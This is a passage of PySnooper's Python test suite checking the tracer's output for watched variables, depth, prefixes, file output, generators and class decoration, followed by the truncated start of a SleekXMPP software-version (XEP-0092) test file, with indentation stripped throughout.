@pysnooper.snoop(watch_explode=('_d', '_point', 'lst + []'), normalize=normalize)
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry('_point'),
VariableEntry('_point.x', '3'),
VariableEntry('_point.y', '4'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[0]', '7'),
VariableEntry('(lst + [])[1]', '8'),
VariableEntry('(lst + [])[2]', '9'),
VariableEntry('lst + []'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[3]', '10'),
VariableEntry('lst + []'),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_variables_classes(normalize):
class WithSlots(object):
__slots__ = ('x', 'y')
def __init__(self):
self.x = 3
self.y = 4
@pysnooper.snoop(watch=(
pysnooper.Keys('_d', exclude='c'),
pysnooper.Attrs('_d'), # doesn't have attributes
pysnooper.Attrs('_s'),
pysnooper.Indices('_lst')[-3:],
), normalize=normalize)
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('WithSlots'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
LineEntry(),
VariableEntry('_s'),
VariableEntry('_s.x', '3'),
VariableEntry('_s.y', '4'),
LineEntry(),
VariableEntry('_lst'),
VariableEntry('_lst[997]', '997'),
VariableEntry('_lst[998]', '998'),
VariableEntry('_lst[999]', '999'),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_single_watch_no_comma(normalize):
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch='foo', normalize=normalize)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable(normalize):
@pysnooper.snoop(normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{100}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable_with_custom_max_variable_length(normalize):
@pysnooper.snoop(max_variable_length=200, normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{200}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable_with_infinite_max_variable_length(normalize):
@pysnooper.snoop(max_variable_length=None, normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{1000,100000}$)\[0, 1, 2, [^.]+ 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_repr_exception(normalize):
class Bad(object):
def __repr__(self):
1 / 0
@pysnooper.snoop(normalize=normalize)
def my_function():
bad = Bad()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Bad'),
CallEntry('def my_function():'),
LineEntry('bad = Bad()'),
VariableEntry('bad', value='REPR FAILED'),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_depth(normalize):
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
@pysnooper.snoop(string_io, depth=3, normalize=normalize)
def f1(x1):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f1(x1):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_method_and_prefix(normalize):
class Baz(object):
def __init__(self):
self.x = 2
@pysnooper.snoop(watch=('self.x',), prefix='ZZZ', normalize=normalize)
def square(self):
foo = 7
self.x **= 2
return self
baz = Baz()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = baz.square()
assert result is baz
assert result.x == 4
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix='ZZZ'),
VariableEntry('self', prefix='ZZZ'),
VariableEntry('self.x', '2', prefix='ZZZ'),
CallEntry('def square(self):', prefix='ZZZ'),
LineEntry('foo = 7', prefix='ZZZ'),
VariableEntry('foo', '7', prefix='ZZZ'),
LineEntry('self.x **= 2', prefix='ZZZ'),
VariableEntry('self.x', '4', prefix='ZZZ'),
LineEntry(prefix='ZZZ'),
ReturnEntry(prefix='ZZZ'),
ReturnValueEntry(prefix='ZZZ'),
),
prefix='ZZZ',
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_file_output(normalize):
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
@pysnooper.snoop(path, normalize=normalize)
def my_function(_foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('_foo', value_regex="u?'baba'"),
CallEntry('def my_function(_foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_confusing_decorator_lines(normalize):
string_io = io.StringIO()
def empty_decorator(function):
return function
@empty_decorator
@pysnooper.snoop(string_io, normalize=normalize,
depth=2) # Multi-line decorator for extra confusion!
@empty_decorator
@empty_decorator
def my_function(foo):
x = lambda bar: 7
y = 8
return y + x(foo)
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
# inside lambda
VariableEntry('bar', value_regex="u?'baba'"),
CallEntry('x = lambda bar: 7'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
# back in my_function
ReturnEntry(),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_lambda(normalize):
string_io = io.StringIO()
my_function = pysnooper.snoop(string_io, normalize=normalize)(lambda x: x ** 2)
result = my_function(7)
assert result == 49
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '7'),
CallEntry(source_regex='^my_function = pysnooper.*'),
LineEntry(source_regex='^my_function = pysnooper.*'),
ReturnEntry(source_regex='^my_function = pysnooper.*'),
ReturnValueEntry('49'),
),
normalize=normalize,
)
def test_unavailable_source():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder, \
mini_toolbox.TempSysPathAdder(str(folder)):
module_name = 'iaerojajsijf'
python_file_path = folder / ('%s.py' % (module_name,))
content = textwrap.dedent(u'''
import pysnooper
@pysnooper.snoop()
def f(x):
return x
''')
with python_file_path.open('w') as python_file:
python_file.write(content)
module = __import__(module_name)
python_file_path.unlink()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = getattr(module, 'f')(7)
assert result == 7
output = output_capturer.output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(stage='starting'),
CallEntry('SOURCE IS UNAVAILABLE'),
LineEntry('SOURCE IS UNAVAILABLE'),
ReturnEntry('SOURCE IS UNAVAILABLE'),
ReturnValueEntry('7'),
)
)
def test_no_overwrite_by_default():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path))
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert output.startswith('lala')
shortened_output = output[4:]
assert_output(
shortened_output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_overwrite():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path), overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert 'lala' not in output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_error_in_overwrite_argument():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
with pytest.raises(Exception, match='can only be used when writing'):
@pysnooper.snoop(overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
def test_needs_parentheses():
assert not needs_parentheses('x')
assert not needs_parentheses('x.y')
assert not needs_parentheses('x.y.z')
assert not needs_parentheses('x.y.z[0]')
assert not needs_parentheses('x.y.z[0]()')
assert not needs_parentheses('x.y.z[0]()(3, 4 * 5)')
assert not needs_parentheses('foo(x)')
assert not needs_parentheses('foo(x+y)')
assert not needs_parentheses('(x+y)')
assert not needs_parentheses('[x+1 for x in ()]')
assert needs_parentheses('x + y')
assert needs_parentheses('x * y')
assert needs_parentheses('x and y')
assert needs_parentheses('x if z else y')
@pytest.mark.parametrize("normalize", (True, False))
def test_with_block(normalize):
# Testing that a single Tracer can handle many mixed uses
snoop = pysnooper.snoop(normalize=normalize)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry('x', '2'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# In with in recursive call
VariableEntry('x', '1'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# Call to bar1 from if block outside with
VariableEntry('_x', '0'),
VariableEntry('qux'),
CallEntry('def bar1(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in recursive call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '1'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in recursive call
LineEntry('qux()'),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '2'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in first call
LineEntry('qux()'),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_with_block_depth(normalize):
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
def f1(x1):
str(3)
with pysnooper.snoop(string_io, depth=3, normalize=normalize):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(x1)'),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_cellvars(normalize):
string_io = io.StringIO()
def f2(a):
def f3(a):
x = 0
x += 1
def f4(a):
y = x
return 42
return f4(a)
return f3(a)
def f1(a):
with pysnooper.snoop(string_io, depth=4, normalize=normalize):
result1 = f2(a)
return result1
result = f1(42)
assert result == 42
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(a)'),
VariableEntry(),
CallEntry('def f2(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry("a"),
CallEntry('def f3(a):'),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
VariableEntry("x"),
CallEntry('def f4(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_var_order(normalize):
string_io = io.StringIO()
def f(one, two, three, four):
five = None
six = None
seven = None
five, six, seven = 5, 6, 7
with pysnooper.snoop(string_io, depth=2, normalize=normalize):
result = f(1, 2, 3, 4)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result = f(1, 2, 3, 4)'),
VariableEntry("one", "1"),
VariableEntry("two", "2"),
VariableEntry("three", "3"),
VariableEntry("four", "4"),
CallEntry('def f(one, two, three, four):'),
LineEntry(),
VariableEntry("five"),
LineEntry(),
VariableEntry("six"),
LineEntry(),
VariableEntry("seven"),
LineEntry(),
VariableEntry("five", "5"),
VariableEntry("six", "6"),
VariableEntry("seven", "7"),
ReturnEntry(),
ReturnValueEntry(),
),
normalize=normalize,
)
def test_truncate():
max_length = 20
for i in range(max_length * 2):
string = i * 'a'
truncated = truncate(string, max_length)
if len(string) <= max_length:
assert string == truncated
else:
assert truncated == 'aaaaaaaa...aaaaaaaaa'
assert len(truncated) == max_length
def test_indentation():
from .samples import indentation, recursion
assert_sample_output(indentation)
assert_sample_output(recursion)
def test_exception():
from .samples import exception
assert_sample_output(exception)
def test_generator():
string_io = io.StringIO()
original_tracer = sys.gettrace()
original_tracer_active = lambda: (sys.gettrace() is original_tracer)
@pysnooper.snoop(string_io)
def f(x1):
assert not original_tracer_active()
x2 = (yield x1)
assert not original_tracer_active()
x3 = 'foo'
assert not original_tracer_active()
x4 = (yield 2)
assert not original_tracer_active()
return
assert original_tracer_active()
generator = f(0)
assert original_tracer_active()
first_item = next(generator)
assert original_tracer_active()
assert first_item == 0
second_item = generator.send('blabla')
assert original_tracer_active()
assert second_item == 2
with pytest.raises(StopIteration) as exc_info:
generator.send('looloo')
assert original_tracer_active()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x1', '0'),
VariableEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('0'),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x2', "'blabla'"),
LineEntry(),
LineEntry(),
VariableEntry('x3', "'foo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('2'),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x4', "'looloo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(None),
)
)
@pytest.mark.parametrize("normalize", (True, False))
def test_custom_repr(normalize):
string_io = io.StringIO()
def large(l):
return isinstance(l, list) and len(l) > 5
def print_list_size(l):
return 'list(size={})'.format(len(l))
def print_dict(d):
return 'dict(keys={})'.format(sorted(list(d.keys())))
def evil_condition(x):
return large(x) or isinstance(x, dict)
@pysnooper.snoop(string_io, custom_repr=(
(large, print_list_size),
(dict, print_dict),
(evil_condition, lambda x: 'I am evil')),
normalize=normalize,)
def sum_to_x(x):
l = list(range(x))
a = {'1': 1, '2': 2}
return sum(l)
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'list(size=10000)'),
LineEntry(),
VariableEntry('a', "dict(keys=['1', '2'])"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('49995000'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_custom_repr_single(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, custom_repr=(list, lambda l: 'foofoo!'), normalize=normalize)
def sum_to_x(x):
l = list(range(x))
return 7
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'foofoo!'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
),
normalize=normalize,
)
def test_disable():
string_io = io.StringIO()
def my_function(foo):
x = 7
y = 8
return x + y
with mini_toolbox.TempValueSetter((pysnooper.tracer, 'DISABLED'), True):
tracer = pysnooper.snoop(string_io)
with tracer:
result = my_function('baba')
my_decorated_function = tracer(my_function)
my_decorated_function('booboo')
output = string_io.getvalue()
assert not output
@pytest.mark.parametrize("normalize", (True, False))
def test_class(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('self', value_regex="u?.+MyClass object"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_decorated_method(normalize):
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('args', value_regex=r"\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"\{\}"),
VariableEntry('function', value_regex="u?.+my_method"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_decorated_method_and_snoop_applied_to_method(normalize):
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
@pysnooper.snoop(string_io, normalize=normalize)
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('args', value_regex=r"u?\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"u?\{\}"),
VariableEntry('function', value_regex="u?.*my_method"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_property(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self._x = 0
def plain_method(self):
pass
@property
def x(self):
self.plain_method()
return self._x
@x.setter
def x(self, value):
self.plain_method()
self._x = value
@x.deleter
def x(self):
self.plain_method()
del self._x
instance = MyClass()
# Do simple property operations, make sure we didn't mess up the normal behavior
result = instance.x
assert result == instance._x
instance.x = 1
assert instance._x == 1
del instance.x
with pytest.raises(AttributeError):
instance._x
# The property methods will not be traced, but their calls to plain_method will be.
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self._x = 0'),
ReturnEntry('self._x = 0'),
ReturnValueEntry('None'),
# Called from getter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
# Called from setter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
# Called from deleter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_snooping_on_class_does_not_cause_base_class_to_be_snooped(normalize):
string_io = io.StringIO()
class UnsnoopedBaseClass(object):
def __init__(self):
self.method_on_base_class_was_called = False
def method_on_base_class(self):
self.method_on_base_class_was_called = True
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(UnsnoopedBaseClass):
def method_on_child_class(self):
self.method_on_base_class()
instance = MyClass()
assert not instance.method_on_base_class_was_called
instance.method_on_child_class()
assert instance.method_on_base_class_was_called
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def method_on_child_class(self):'),
LineEntry('self.method_on_base_class()'),
ReturnEntry('self.method_on_base_class()'),
ReturnValueEntry('None'),
),
normalize=normalize,
)
def test_normalize():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry('test_pysnooper.py'),
VariableEntry('A', value_regex=r"<class .*\.A.?>"),
CallEntry('def add():'),
LineEntry('a = A(19)'),
VariableEntry('a', value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry('b = A(22)'),
VariableEntry('b', value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry('res = a.a + b.a'),
VariableEntry('res', value="41"),
LineEntry('return res'),
ReturnEntry('return res'),
ReturnValueEntry('41'),
)
)
def test_normalize_prefix():
string_io = io.StringIO()
_prefix = 'ZZZZ'
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True, prefix=_prefix)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry('test_pysnooper.py', prefix=_prefix),
VariableEntry('A', value_regex=r"<class .*\.A.?>", prefix=_prefix),
CallEntry('def add():', prefix=_prefix),
LineEntry('a = A(19)', prefix=_prefix),
VariableEntry('a', value_regex=r"<.*\.A (?:object|instance)>", prefix=_prefix),
LineEntry('b = A(22)', prefix=_prefix),
VariableEntry('b', value_regex=r"<.*\.A (?:object|instance)>", prefix=_prefix),
LineEntry('res = a.a + b.a', prefix=_prefix),
VariableEntry('res', value="41", prefix=_prefix),
LineEntry('return res', prefix=_prefix),
ReturnEntry('return res', prefix=_prefix),
ReturnValueEntry('41', prefix=_prefix),
)
)
def test_normalize_thread_info():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True, thread_info=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
with pytest.raises(NotImplementedError):
add()
|
test_stream_xep_0092.py
|
import threading
import unittest
from sleekxmpp.test import SleekTest
class TestStreamSet(SleekTest):
def tearDown(self):
self.stream_close()
def testHandleSoftwareVersionRequest(self):
self.stream_start(mode='client', plugins=['xep_0030', 'xep_0092'])
self.xmpp['xep_0092'].name = 'SleekXMPP'
self.xmpp['xep_0092'].version = 'dev'
self.xmpp['xep_0092'].os = 'Linux'
self.recv("""
<iq type="get" id="1">
<query xmlns="jabber:iq:version" />
</iq>
""")
self.send("""
<iq type="result" id="1">
<query xmlns="jabber:iq:version">
<name>SleekXMPP</name>
<version>dev</version>
<os>Linux</os>
</query>
</iq>
""")
def testMakeSoftwareVersionRequest(self):
results = []
def query():
r = self.xmpp['xep_0092'].get_version('foo@bar')
